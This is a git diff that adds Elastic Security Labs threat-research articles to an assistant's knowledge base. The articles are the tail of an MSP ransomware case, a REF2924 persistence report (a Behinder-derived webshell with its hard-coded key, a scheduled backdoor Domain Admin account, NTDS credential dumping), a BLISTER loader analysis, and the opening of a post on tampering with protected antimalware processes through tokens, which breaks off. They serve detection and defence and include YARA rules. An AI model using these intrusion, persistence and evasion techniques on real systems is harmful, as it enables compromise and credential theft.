+After the adversary’s attempt to self-inject shellcode and execute ransomware was prevented, their attack on the initial endpoint stopped. After a period of 15 minutes, the adversary returned and attempted to execute the same procedures on an additional five endpoints before giving up. All of their attempts to deploy ransomware were prevented.
+
+## Conclusion
+
+In this post, we discussed a real-world case of a malicious actor abusing trusted relationships between an MSP and its customers and attempting to deploy ransomware. This highlights the importance of understanding the relationships that your organization has with third parties and the potential impact if those connections are abused.
+
+Analyzing the alerts revealed that the adversary connected to the customer’s environment via remote desktop support software and executed a malicious script with the intention of downloading, injecting, and executing ransomware. All of the adversary’s attempts were prevented.
+
+This case also demonstrates the importance of having a layered approach to security and being able to detect and prevent adversary behavior and fileless attacks. We dissected the attackers procedures and showed how EQL and Reflex can be used to create custom rules and responses.
+
+Looking only for malicious files is not enough; Elastic Endpoint Security provides several layers of behavior-based protections against ransomware, fileless attacks, phishing, exploits, and adversary behavior.
+
+[EQL support is being added to Elasticsearch](https://github.com/elastic/elasticsearch/issues/49581).
+
+_1 — The content has since been removed from Pastebin by its creator or the Pastebin staff_
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/ref2924_howto_maintain_persistence_as_an_advanced_threat.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/ref2924_howto_maintain_persistence_as_an_advanced_threat.md
new file mode 100644
index 0000000000000..a64690a3ec196
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/ref2924_howto_maintain_persistence_as_an_advanced_threat.md
@@ -0,0 +1,141 @@
+---
+title: "REF2924: how to maintain persistence as an (advanced?) threat"
+slug: "ref2924-howto-maintain-persistence-as-an-advanced-threat"
+date: "2023-03-27"
+description: "Elastic Security Labs describes new persistence techniques used by the group behind SIESTAGRAPH, NAPLISTENER, and SOMNIRECORD."
+author:
+  - slug: remco-sprooten
+image: "blog-thumb-pink-grapefruit-outlier.jpg"
+category:
+  - slug: attack-pattern
+tags:
+  - ref2924
+  - siestagraph
+  - naplistener
+  - somnirecord
+---
+
+## Preamble
+
+In recent months, there has been a noticeable shift in the nature of the incidents being tracked under REF2924. Initially, the attacker employed custom, purpose-built malware. As the attack evolved, we observed the same group resorting to the use of open source tools or publicly available source code as a basis for developing new capabilities.
+
+### Key takeaways
+
+- The attacker has shifted from using custom malware to open source tools or publicly available source code to develop new capabilities.
+
+  - The attacker has also deployed open source tools like TFirewall and AdFind in the victim's environment.
+  - In order to maintain persistence the attacker has deployed multiple different tools and techniques.
+
+### .NET Webshell
+
+On February 16th, 2023 Elastic Security Labs observed the Microsoft .NET compiler ( `csc.exe` ) being used to compile a DLL file,. The output was identified by [Elastic Defend](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image2.jpg) as a malicious file. Analysts who may have observed dynamic runtime compilation of .NET web shells should note that this was performed by the operator, not automatically by the system.
+
+![The attacker uses the C# compiler to prepare a .NET webshell for use](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image4.jpg)
+
+The resulting output file was named `App_Web_lgntop.aspx.ec688436.pkx46see.dll` (a50ca8df4181918fe0636272f31e19815f1b97cce6d871e15e03b0ee0e3da17b) and was the subject of malware analysis.
+
+#### Analysis
+
+The web shell requires a small amount of pre-configuration to ensure it listens for the correct URI. In this case the path will be " `~/auth/Current/themes/resources/lgntop.aspx`".
+
+![Registering the URI](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image6.jpg)
+
+This path is expected on Microsoft Exchange Outlook Web Access (OWA) sites, so it was likely selected to blend in with the OWA service that is running on the target server. Once a web request is received it is processed by the following method.
+
+![Request processing method.](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image2.jpg)
+
+This method checks if a specific HTTP header named `XFF` is present in the request headers. If it is present and its value, after passing through an MD5 hash function and a substring function, matches the string " `19267E61029B4546`", then the method proceeds to execute the rest of the code. The string is likely used as an authentication key to prevent others from using the webshell.
+
+Within the `if` statement, the method reads the binary data from the request body using the `BinaryRead` method and stores it in a byte array. It then creates a string containing the fully qualified name of a .NET type that the code wants to load and gets a reference to that type using the `Type.GetType` method. The byte array in the image is the ASCII code representation of the text “ `System.Reflection.Assembly` ”. This way of presenting the code is done in order to avoid string-based detection. The `System.Reflection.Assembly` class provides methods and properties to load, examine, and manipulate assemblies at runtime.
+
+The code obtains a reference to a method named `Load` in the loaded type and invokes it using the `Invoke` method. The `Load` method takes a byte array as a parameter, which the code decrypts using a `Decrypt` method (not shown in this publication). The result of the `Load` method invocation is stored in an object variable.
+
+The code then gets a reference to another method named `CreateInstance` in the loaded type and invokes it using the `Invoke` method. The `CreateInstance` method takes a string as a parameter, which the code constructs from a byte array containing the ASCII codes for the string U. The result of the `CreateInstance` method invocation is stored in an object variable.
+
+Finally, the code calls the `Equals` method on the object, passing in the current object. Because `Equals` will call `GetType` on the object, this approach is a way to indirectly call functions covertly.
+
+The `Encrypt` and `Decrypt` functions include a hard-coded key.
+
+![The Encrypt function](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image1.png)
+
+#### Sources
+
+The key " `e45e329feb5d925b`" is the result of taking the first half of the MD5 hash of the string "rebeyond". The string “rebeyond” refers to the developer of the Behinder web shell framework. This refers to the developer of the [Behinder](https://github.com/rebeyond/Behinder) webshell framework. This key is also the default value when you generate a shell template using the Behinder or derivative [Godzilla](https://github.com/BeichenDream/Godzilla) webshell frameworks.
+
+### Persistence module
+
+On February 13, 2023, we observed a new persistent malware called `kavUpdate.exe` written in .NET with an exceptionally small footprint (about 6Kb compiled). We believe this software was developed specifically for this environment by the threat. Elastic Security Labs observed this binary persisting via a Scheduled Task, though other mechanisms would likely be compatible.
+
+#### Analysis
+
+![](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image3.jpg)
+
+This code is designed with the sole purpose of executing a set of predefined commands. The malware checks the current day and hour, and if it is Monday or Thursday at 5am, it will execute a series of commands:
+
+1. Delete the user 'norshasa'
+2. Add the user 'norshasa' with the password '[P@ssw0rd123](mailto:P@ssw0rd123)...'
+3. Activate the user 'norshasa'
+4. Add the user 'norshasa' to the Domain Admins group
+5. Add the user 'norshasa' to the Remote Desktop Users group
+6. Create a [full backup of NTDS](<https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732530(v=ws.11)>) in the `C:\ProgramData\temp` folder
+7. On the same days of the week, one hour later at 6am, delete the user 'norshasa.'
+
+### Open source tools
+
+On January 2nd, 2023 the threat deployed [TFirewall](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image2.jpg) in the victim's environment. TFirewall is a testing tool designed to evaluate whether hosts can establish a SOCKS5 proxy within an intranet environment while allowing for outbound network communication through specific ports. Developed using Golang, TFirewall is comprised of a client and server component and is compatible with multiple operating systems.
+
+Along with TFirewall, we observed that the attacker used the free tool [AdFind](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image1.png). `AdFind` is a command line utility for querying Active Directory and other directory services. AdFind can be run on Windows 7 or newer and requires no special security permissions beyond the ability to launch executables. It’s written in C++ and compiled with Visual Studio 2022. The source code is not available.
+
+The binary is [quickly identifiable](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image2.jpg) based on its hash (114b37df703d46a44de0bc96afab8b8590e59a3c389558dd531298e5dd275acb). During execution, we recognized the use of AdFind-specific command line flags and parameters:
+
+![AdFind Parameters](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image2.jpg)
+
+On March 6th, 2023 we observed a process named `nat.exe`. Initially, the file was only identified as generically malicious. However, if we take a closer look at the command line parameters that are used during execution, we have a hint for which tool the attacker is using.
+
+![Commandline parameters for nat.exe](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image1.png)
+
+Based on these arguments, we can safely conclude it's a packed version of the Impacket tool [secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py). Impacket contains a collection of Python classes for working with network protocols. Impacket is commonly used to carry out a variety of tasks related to network security and penetration testing, though it may also be abused by threat actors.
+
+Using the same approach (examining the command line parameters), we identified the use of the tool called [NTDSDumpEx](https://github.com/zcgonvh/NTDSDumpEx) which exhibited the same command line arguments employed by this tool:
+
+![Commandline arguments for NTDSDumpEx](/assets/images/ref2924-howto-maintain-persistence-as-an-advanced-threat/image3.jpg)
+
+`NTDSDumpEx` is capable of extracting data from the Active Directory NTDS.dit database in its offline state, meaning the database does not have to be running. It can extract information such as user accounts, group memberships, access control lists, and other directory objects.
+
+### Background
+
+Throughout the attack we witnessed a combination of TTPs that provide a recognizable fingerprint. For example, the way the attacker exported mailboxes is described in detail in [this](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E4%BB%8EExchange%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E6%90%9C%E7%B4%A2%E5%92%8C%E5%AF%BC%E5%87%BA%E9%82%AE%E4%BB%B6) blog post. We also see a strong resemblance in the way credentials from LSASS are being exported, as described [here](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E4%BB%8Elsass.exe%E8%BF%9B%E7%A8%8B%E5%AF%BC%E5%87%BA%E5%87%AD%E6%8D%AE). The majority of the commands and tools deployed by the attacker are well described on the same GitHub users’ [tips](https://github.com/3gstudent/Pentest-and-Development-Tips) repository.
+
+We also note that the technique used to deploy NAPLISTENER is described [here](https://3gstudent.github.io/%E5%88%A9%E7%94%A8IIS%E7%9A%84%E7%AB%AF%E5%8F%A3%E5%85%B1%E4%BA%AB%E5%8A%9F%E8%83%BD%E7%BB%95%E8%BF%87%E9%98%B2%E7%81%AB%E5%A2%99) and the deployment method for malicious IIS modules like DOORME can be found in [this](https://3gstudent.github.io/%E5%88%A9%E7%94%A8IIS%E7%9A%84%E6%A8%A1%E5%9D%97%E5%8A%9F%E8%83%BD%E7%BB%95%E8%BF%87%E9%98%B2%E7%81%AB%E5%A2%99) blog post. And lastly, a [post](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Exchange%E4%B8%80%E5%8F%A5%E8%AF%9D%E5%90%8E%E9%97%A8%E7%9A%84%E6%89%A9%E5%B1%95) on Godzilla and Behinder web shells in exchange servers closely reflects how these capabilities were implemented within targeted environments.
+
+During malware analysis of the SIESTAGRAPH, NAPLISTENER, and SOMNIRECORD families, we also identified open source repositories that minimally served as the inspiration for these payloads and which have been described in other publications from Elastic Security Labs.
+
+We conclude that the attackers are at the very least regular consumers of blogs and open source repositories, both of which have contributed to the rapid pace of this threat’s activities.
+
+### Detection logic
+
+The following prebuilt protections are available from Elastic: - [AdFind Command Activity](https://www.elastic.co/guide/en/security/current/adfind-command-activity.html)
+
+### YARA
+
+Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the Behinder web shell.
+
+`rule Windows_Trojan_Behinder {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-03-02"
+        last_modified = "2023-03-02"
+        description = "Web shell found in REF2924, related to Behinder or Godzilla"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "Behinder"
+        threat_name = "Windows.Trojan.Behinder"
+        License = “Elastic License v2”
+        reference_sample = "a50ca8df4181918fe0636272f31e19815f1b97cce6d871e15e03b0ee0e3da17b"
+    strings:
+        $load = { 53 79 73 74 65 6D 2E 52 65 66 6C 65 63 74 69 6F 6E 2E 41 73 73 65 6D 62 6C 79 }
+        $key = "e45e329feb5d925b" ascii wide
+    condition:
+        all of them
+}`
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/revisiting_blister_new_developments_of_the_blister_loader.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/revisiting_blister_new_developments_of_the_blister_loader.md
new file mode 100644
index 0000000000000..97c75f4b5f4b8
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/revisiting_blister_new_developments_of_the_blister_loader.md
@@ -0,0 +1,192 @@
+---
+title: "Revisiting BLISTER: New development of the BLISTER loader"
+slug: "revisiting-blister-new-developments-of-the-blister-loader"
+date: "2023-08-24"
+description: "Elastic Security Labs dives deep into the recent evolution of the BLISTER loader malware family."
+author:
+  - slug: salim-bitam
+  - slug: daniel-stepanic
+image: "cracked-lava.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - blister
+  - malware
+  - ref7890
+---
+
+## Preamble
+
+In a fast-paced and ever-changing world of cybercrime threats, the tenacity and adaptability of malicious actors is a significant concern. BLISTER, a malware loader initially [discovered](https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign) by Elastic Security Labs in 2021 and associated with financially-motivated intrusions, is a testament to this trend as it continues to develop additional capabilities. Two years after its initial discovery, BLISTER continues to receive updates while flying under the radar, gaining momentum as an emerging threat. Recent findings from Palo Alto’s [Unit 42](https://twitter.com/Unit42_Intel/status/1684583246032506880) describe an updated [SOCGHOLISH](https://redcanary.com/threat-detection-report/threats/socgholish/) infection chain used to distribute BLISTER and deploy a payload from [MYTHIC](https://github.com/its-a-feature/Mythic), an open-source Command and Control (C2) framework.
+
+## Key takeaways
+
+ - Elastic Security Labs has been monitoring malware loader BLISTER ramping up with new changes, and ongoing development with signs of imminent threat activity
+ - New BLISTER update includes keying feature that allows for precise targeting of victim networks and lowers exposure within VM/sandbox environments
+ - BLISTER now integrates techniques to remove any process instrumentation hook and has modified its configuration with multiple revisions, now encompassing additional fields and flags.
+
+## Overview
+
+Our research uncovered new functionality that was previously absent within the BLISTER family, indicating ongoing development. However, the malware authors continue to use a distinctive technique of embedding malicious code in otherwise legitimate applications. This approach superficially appears successful, given the low rates of detection for many vendors as seen in VirusTotal. The significant amount of benign code and use of encryption to protect the malicious code are likely two factors impacting detection.
+
+![Example of BLISTER detection rates on initial upload
+](/assets/images/revisiting-blister-new-developments-of-the-blister-loader/image11.png)
+
+Recently, Elastic Security Labs has observed many new BLISTER loaders in the wild. After analyzing various samples, it’s clear that the malware authors have made some changes and have been watching the antivirus industry closely. In one [sample](https://www.virustotal.com/gui/file/b4f37f13a7e9c56ea95fa3792e11404eb3bdb878734f1ca394ceed344d22858f) from early June, we can infer that the authors were testing with a non-production loader that displays a Message Box displaying the strings “Test”.
+
+![BLISTER payload with Message Box test](/assets/images/revisiting-blister-new-developments-of-the-blister-loader/image2.png)
+
+Readers can see a disassembled view of this functionality below.
+
+![BLISTER testing payloads with Message Box
+](/assets/images/revisiting-blister-new-developments-of-the-blister-loader/image4.jpg)
+
+By the end of July, we observed campaigns involving a new BLISTER loader that targeted victim organizations to deploy the MYTHIC implant.
+
+![MYTHIC running inside injected WerFault process
+](/assets/images/revisiting-blister-new-developments-of-the-blister-loader/image6.jpg)
+
+At the time of this writing, Elastic Security Labs is seeing a stream of BLISTER samples which deploy MYTHIC and have very low rates of detection. 
+
+![Wave of BLISTER samples in August 2023](/assets/images/revisiting-blister-new-developments-of-the-blister-loader/image1.png)
+
+## Comparative analyses
+
+### Smuggling malicious code
+
+The authors behind BLISTER employ a consistent strategy of embedding BLISTER's malicious code within a legitimate library. The most recent variants of this loader have targeted the [VLC](https://www.videolan.org/vlc/) Media Player library to smuggle their malware into victim environments. This blend of benign and malicious code seems effective at defeating some kinds of machine-learning models.
+
+![Meta data of BLISTER sample](/assets/images/revisiting-blister-new-developments-of-the-blister-loader/image10.png)
+
+The following is a comparison between a legitimate VLC DLL and one that is infected with BLISTER’s code. In the infected sample, the entry point that references malicious code has been indicated in red. This methodology is similar to prior BLISTER variants.
+
+![Comparison between original and patched VLC library](/assets/images/revisiting-blister-new-developments-of-the-blister-loader/image8.png)
+
+### Different hashing algorithm
+
+One of the changes implemented since our last [write-up](https://www.elastic.co/security-labs/blister-loader) is the adoption of a different hashing algorithm used in the core and in the loader part of BLISTER. While the previous version used simple logic to shift bytes, this new version includes a hard-coded seed with XOR and multiplication operations. Researchers speculate that changing the hashing approach helps to evade antimalware products that rely on YARA signatures.
+
+![Disassembled hashing algorithm](/assets/images/revisiting-blister-new-developments-of-the-blister-loader/image13.png)
+
+### Configuration retrieval
+
+Following the decryption of malicious code by the BLISTER’d loader, it employs an identical memory scanning method to identify the configuration data blob. This is accomplished by searching for a predetermined, hardcoded memory pattern. A notable contrast from the earlier iteration of BLISTER lies in the fact that the configuration is now decrypted in conjunction with the core code, rather than being treated as a separate entity.
+
+### Environmental keying
+
+A recent addition to BLISTER is the capability to exclusively execute on designated machines. This behavior is activated by configuring the appropriate flag within the malware’s configuration. Subsequently, the malware proceeds to extract the machine's domain name using the `GetComputerNameExW` Windows API. Following this, the domain name is hashed using the previously mentioned algorithm, and the resulting hash is then compared to a hash present in the configuration. This functionality is presumably deployed for the purpose of targeted attacks or for testing scenarios, ensuring that the malware refrains from infecting unintended systems such as those employed by malware researchers.
+
+![Environmental keying feature](/assets/images/revisiting-blister-new-developments-of-the-blister-loader/image12.png)
+
+One of the few malware analysis tools capable of quickly exposing this behavior is the awesome [Tiny Tracer](https://github.com/hasherezade/tiny_tracer) utility by [hasherezade](https://twitter.com/hasherezade). We’ve included an excerpt from Tiny_Tracer below which captures the BLISTER process immediately terminating after the `GetComputerNameExW` validation is performed in a sandboxed analysis VM.
+
+![TinyTracer logs](/assets/images/revisiting-blister-new-developments-of-the-blister-loader/image15.png)
+
+### Time-based anti-debugging feature
+
+Similar to its predecessors, the malware incorporates a time-based anti-debugging functionality. However, unlike the previous versions in which the timer was hardcoded, the updated version introduces a new field in the configuration. This field enables the customization of the sleep timer, with a default value of 10 minutes. This default interval remains unchanged from prior iterations of BLISTER.
+
+![Time-Based Anti-Debug Feature](/assets/images/revisiting-blister-new-developments-of-the-blister-loader/image9.png)
+
+### Unhook process instrumentation to detect syscalls
+
+In this latest version, BLISTER introduces noteworthy functionality: it unhooks any ongoing process instrumentation, a [tactic](https://github.com/ionescu007/HookingNirvana/blob/master/Esoteric%20Hooks.pdf) designed to circumvent userland syscall detection mechanisms upon which certain EDR solutions are based.
+
+![Unhooking process instrumentation](/assets/images/revisiting-blister-new-developments-of-the-blister-loader/image3.png)
+
+### BLISTER's configuration
+
+The BLISTER configuration structure has also been changed with the latest variants. Two new fields have been added and the flag field at offset 0 has been changed from a WORD to a DWORD value. The new fields pertain to the hash of the domain for environmental keying and the configurable sleep time; these field values are at offset 4 and 12 respectively. The following is the updated structure of the configuration:
+
+![Configuration structure](/assets/images/revisiting-blister-new-developments-of-the-blister-loader/image14.png)
+
+Changes have also been made to the configuration flags, allowing the operator to activate different functions within the malware. Researchers have provided an updated list of functions built upon our prior research into BLISTER.
+
+![Configuration flags enumeration](/assets/images/revisiting-blister-new-developments-of-the-blister-loader/image7.png)
+
+## Payload extractor update
+
+In our previous research publication, we introduced an efficient payload extractor tailored to dissect and extract the configuration and payload of the loader. To dissect the most recent BLISTER variants and capture these new details, we enhanced our extractor which is available [here](https://github.com/elastic/labs-releases/tree/main/tools/blister).
+
+![Configuration extractor](/assets/images/revisiting-blister-new-developments-of-the-blister-loader/image5.png)
+
+## Conclusion
+
+[BLISTER](https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html) is one small part of the global cybercriminal ecosystem, providing financially-motivated threats to gain access to victim environments and avoid detection by security sensors. The community should consider these new developments and assess the efficacy of BLISTER detections, Elastic Security Labs will continue to monitor this threat and share actionable guidance.
+
+## Detection logic
+
+### Prevention
+
+ - [Windows.Trojan.Blister](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Blister.yar)
+ 
+ ### Detection
+ 
+ - [Windows Error Manager/Reporting Masquerading](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_windows_error_manager_reporting_masquerading.toml)
+ - [Potential Operation via Direct Syscall](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_operation_via_direct_syscall.toml)
+ - [Potential Masquerading as Windows Error Manager](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_masquerading_as_windows_error_manager.toml)
+ - [Unusual Startup Shell Folder Modification](https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml)
+ - [Potential Masquerading as VLC DLL](https://github.com/elastic/detection-rules/blob/ef432d0907548abf7699fa5d86150dc6b4133125/rules_building_block/defense_evasion_masquerading_vlc_dll.toml)
+
+### YARA
+
+Elastic Security has created [YARA rules](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Blister.yar) to identify this activity. Below is the latest rule that captures the new update to BLISTER.
+
+```yara
+rule Windows_Trojan_Blister {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-08-02"
+        last_modified = "2023-08-08"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "Blister"
+        threat_name = "Windows.Trojan.Blister"
+        license = "Elastic License v2"
+    strings:
+        $b_loader_xor = { 48 8B C3 49 03 DC 83 E0 03 8A 44 05 48 [2-3] ?? 03 ?? 4D 2B ?? 75 }
+        $b_loader_virtual_protect = { 48 8D 45 50 41 ?? ?? ?? ?? 00 4C 8D ?? 04 4C 89 ?? ?? 41 B9 04 00 00 00 4C 89 ?? F0 4C 8D 45 58 48 89 44 24 20 48 8D 55 F0 }
+    condition:
+        all of them
+}
+```
+
+## Observed adversary tactics and techniques
+
+Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+ - [Execution](https://attack.mitre.org/tactics/TA0002/)
+ - [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)
+ - [Persistence](https://attack.mitre.org/tactics/TA0003/)
+
+## Techniques / Sub techniques
+
+Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.
+
+ - [System Binary Proxy Execution: Rundll32](https://attack.mitre.org/techniques/T1218/011/)
+ - [Execution Guardrails: Environmental Keying](https://attack.mitre.org/techniques/T1480/001/)
+ - [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001/)
+ - [Masquerading](https://attack.mitre.org/techniques/T1036/)
+ - [Process Injection: Process Hollowing](https://attack.mitre.org/techniques/T1055/012/)
+
+## References
+
+The following were referenced throughout the above research:
+ - [Palo Alto Unit42](https://twitter.com/Unit42_Intel/status/1684583246032506880?s=20)
+ - [Trendmicro](https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html)
+ - [Malpedia](https://malpedia.caad.fkie.fraunhofer.de/details/win.blister)
+
+## Observables
+
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/blister) in both ECS and STIX format in a combined zip bundle.
+
+The following observables were discussed in this research.
+
+| Indicator | Type | Reference |
+|-----------|------|-----------|
+| 5fc79a4499bafa3a881778ef51ce29ef015ee58a587e3614702e69da304395db | sha256 | BLISTER loader DLL |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/sandboxing_antimalware_products.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/sandboxing_antimalware_products.md
new file mode 100644
index 0000000000000..534302ea1d70e
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/sandboxing_antimalware_products.md
@@ -0,0 +1,174 @@
+---
+title: "Sandboxing Antimalware Products for Fun and Profit"
+slug: "sandboxing-antimalware-products"
+date: "2023-02-21"
+description: "This article demonstrates a flaw that allows attackers to bypass a Windows security mechanism which protects anti-malware products from various forms of attack."
+author:
+  - slug: gabriel-landau
+image: "blog-thumb-tools-various.jpg"
+category:
+  - slug: security-research
+---
+
+This article demonstrates a flaw that allows attackers to bypass a Windows security mechanism which protects anti-malware products from various forms of attack. This is of particular interest because we build and maintain two anti-malware products that benefit from this protection.
+
+## Protected Anti-Malware Services
+
+Windows 8.1 [introduced](https://docs.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-) a concept of Protected Antimalware Services. This enables specially-signed programs to run such that they are immune from tampering and termination, even by administrative users. Microsoft’s documentation ([archived](https://web.archive.org/web/20211019010629/https://docs.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-)) describes this as:
+
+> In Windows 8.1, a new concept of protected service has been introduced to allow anti-malware user-mode services to be launched as a protected service. After the service is launched as protected, Windows uses code integrity to only allow trusted code to load into the protected service. Windows also protects these processes from code injection and other attacks from admin processes.
+
+The goal is to prevent malware from instantly disabling your antivirus and then running amok. For the rest of this article, we call them Protected Process Light (PPL). For more depth, [Alex Ionescu](https://twitter.com/aionescu) goes into great detail on protected processes in his [talk at NoSuchCon 2014](https://www.youtube.com/watch?v=35L_qJNMu1A).
+
+To be able to run as a PPL, an anti-malware vendor must apply to Microsoft, prove their identity, sign binding legal documents, implement an [Early Launch Anti-Malware](https://docs.microsoft.com/en-us/windows/win32/w8cookbook/secured-boot) (ELAM) driver, run it through a test suite, and submit it to Microsoft for a special Authenticode signature. It is not a trivial process. Once this process is complete, the vendor can [use this ELAM driver](https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi-installelamcertificateinfo) to have Windows protect their anti-malware service by running it as a PPL.
+
+You can see PPL in action yourself by running the following from an elevated administrative command prompt on a default Windows 10 install:
+
+**Protected Process Light in Action**
+
+```
+C:\WINDOWS\system32>whoami
+nt authority\system
+
+C:\WINDOWS\system32>whoami /priv | findstr "Debug"
+SeDebugPrivilege                Debug programs                    Enabled
+
+C:\WINDOWS\system32>taskkill /f /im MsMpEng.exe
+ERROR: The process "MsMpEng.exe" with PID 2236 could not be terminated.
+Reason: Access is denied.
+
+```
+
+As you can see here, even a user running as SYSTEM (or an elevated administrator) with [SeDebugPrivilege](https://devblogs.microsoft.com/oldnewthing/20080314-00/?p=23113) cannot terminate the PPL Windows Defender anti-malware Service (MsMpEng.exe). This is because non-PPL processes like taskkill.exe cannot obtain handles with the PROCESS_TERMINATE access right to PPL processes using APIs such as [OpenProcess](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess).
+
+In summary, Windows attempts to protect PPL processes from non-PPL processes, even those with administrative rights. This is both documented and implemented. That being said, with PROCESS_TERMINATE blocked, let’s see if there are other ways we can interfere with it instead.
+
+## Windows Tokens
+
+A Windows token can be thought of as a security credential. It says who you are and what you’re allowed to do. Typically when a user runs a process, that process runs with their token and can do anything the user can do. Some of the most important data within a token include:
+
+- User identity
+- Group membership (e.g. Administrators)
+- Privileges (e.g. SeDebugPrivilege)
+- Integrity level
+
+Tokens are a critical part of Windows authorization. Any time a Windows thread accesses a [securable object](https://docs.microsoft.com/en-us/windows/win32/secauthz/securable-objects), the OS performs a security check. It compares the thread’s effective token against the [security descriptor](https://docs.microsoft.com/en-us/windows/win32/secauthz/security-descriptors) of the object being accessed. You can read more about tokens in the Microsoft [access token documentation](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens) and the Elastic blog post that [introduces Windows tokens](https://www.elastic.co/blog/introduction-to-windows-tokens-for-security-practitioners).
+
+### Sandboxing Tokens
+
+Some applications, such as web browsers, have been repeated targets of exploitation. Once an attacker successfully exploits a browser process, the exploit payload can perform any action that the browser process can perform. This is because it shares the browser’s token.
+
+To mitigate the damage from such attacks, web browsers have moved much of their code into lower-privilege worker processes. This is typically done by creating a restricted security context called a sandbox. When a sandboxed worker needs to perform a privileged action on the system, such as saving a downloaded file, it can ask a non-sandboxed “broker” process to perform the action on its behalf. If the sandboxed process is exploited, the goal is to limit the payload’s ability to cause harm to only resources accessible by the sandbox.
+
+While modern sandboxing involves several components of OS security, one of the most important is a low-privilege, or restricted, token. New sandbox tokens can be created with APIs such as
+
+[CreateRestrictedToken](https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-createrestrictedtoken)
+. Sometimes a sandboxed process needs to lock itself down after performing some initialization. The
+[AdjustTokenPrivileges](https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokenprivileges)
+and
+[AdjustTokenGroups](https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokengroups)
+APIs allow this adjustment. These APIs enable privileges and groups to be “forfeit” from an existing process’s token in such a way that they cannot be restored without creating a new token outside the sandbox.
+
+One [commonly used sandbox](https://chromium.googlesource.com/chromium/src/+/master/docs/design/sandbox.md) today is part of Google Chrome. Even some [security products](https://www.microsoft.com/security/blog/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox/) are getting into sandboxing these days.
+
+### Accessing Tokens
+
+Windows provides the [OpenProcessToken](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocesstoken)API to enable interaction with process tokens. MSDN states that one must have the PROCESS_QUERY_INFORMATION right to use OpenProcessToken. Since a non-protected process can only get PROCESS_QUERY_LIMITED_INFORMATION access to a PPL process (note the LIMITED), it is seemingly impossible to get a handle to a PPL process’s token. However, MSDN is incorrect in this case. With only PROCESS_QUERY_LIMITED_INFORMATION, we can successfully open the token of a protected process. [James Forshaw](https://twitter.com/tiraniddo)explains this documentation discrepancy in more depth, showing the underlying
+
+[de-compiled kernel code](https://www.tiraniddo.dev/2017/05/reading-your-way-around-uac-part-2.html).
+
+Tokens are themselves securable objects. As such, regular access checks still apply. The effective token of the thread attempting to access the token is checked against the security descriptor of the token being accessed for the requested access rights (TOKEN_QUERY, TOKEN_WRITE, TOKEN_IMPERSONATE, etc). For more detail about access checks, see the Microsoft article, “[How Access Checks Work](https://docs.microsoft.com/en-us/windows/win32/secauthz/how-dacls-control-access-to-an-object).”
+
+## The Attack
+
